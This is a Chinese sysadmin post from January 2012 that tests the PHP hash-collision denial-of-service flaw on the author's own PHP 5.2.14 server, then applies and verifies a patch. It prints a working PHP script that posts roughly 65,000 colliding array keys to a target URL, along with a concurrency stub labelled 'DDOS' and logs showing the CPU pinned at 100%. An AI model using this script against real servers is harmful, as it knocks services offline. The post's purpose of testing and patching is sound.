php的hash漏洞,php hash漏洞测试及补丁

PHP hash漏洞测试环境：

Ip:xx.xx.31.167　　　 Nginx0.8+php5.2.14　　4颗CPU　。

一、未打补丁前：

# curl --head http://127.0.0.1

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 06 Jan 2012 06:10:09 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.2.14php5.2.14版本,负载0

测试***代码：

1)dos.php脚本pow(2,15)是构架hash碰撞的post数据data

$size = pow(2, 16);

$array = array();

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://115.238.31.167/test.php");

for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {

#$array[$key] = 0;

$argument.="a[".$key."]=0&";

}

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, '0');

curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');

$return['result'] = curl_exec($ch);

$return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

?>

测试单个并发连接http://xx.xx.31.167/dos.php?a=.1.　　结果单个php-cgi进程,单个CPU占100%。

如开两个窗口并发连接，则两个PHP进程，两个CPU　都占满100%。

2)ddos.php脚本php模拟post提交数据

DDOS

for($i=0; $i<5; $i++){//并发数

echo '';

}

?>

xx.xx.31.167 - - [06/Jan/2012:14:04:27 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"

xx.xx.194.180 - - [06/Jan/2012:14:04:27 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"

xx.xx.31.167 - - [06/Jan/2012:14:05:26 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"

xx.xx.194.180 - - [06/Jan/2012:14:05:26 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"

php模拟post提交,CPU瞬间全占满100%.

二、打补丁

2.具体操作：

#/usr/local/php/sbin/php-fpm stop 停止php服务

# cd /tmp/php-5.2.14　　进入源码目录

# patch -p1 < ../php-5.2.14-max-input-vars.patch 打入补丁包

#./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --with-iconv-dir=/usr/local --with-freetype-dir --with-jpeg-dir --with-png-dir --with-zlib --with-libxml-dir=/usr --enable-xml --disable-rpath --enable-discard-path --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex --enable-fastcgi --enable-fpm --enable-force-cgi-redirect --enable-mbstring --with-gd --enable-gd-native-ttf --with-mcrypt --with-openssl --with-mhash --enable-sockets --enable-pcntl --with-xmlrpc --enable-zip --enable-soap重新编译

#make clean

#make ZEND_EXTRA_LIBS='-liconv'

#make install

查看配置文件是否被覆盖安装。开启php-fpm服务

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 06 Jan 2012 08:05:38 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.2.14p1　　补丁已打上5.2.14p1

再次php hash***测试：

很强大，已无影响.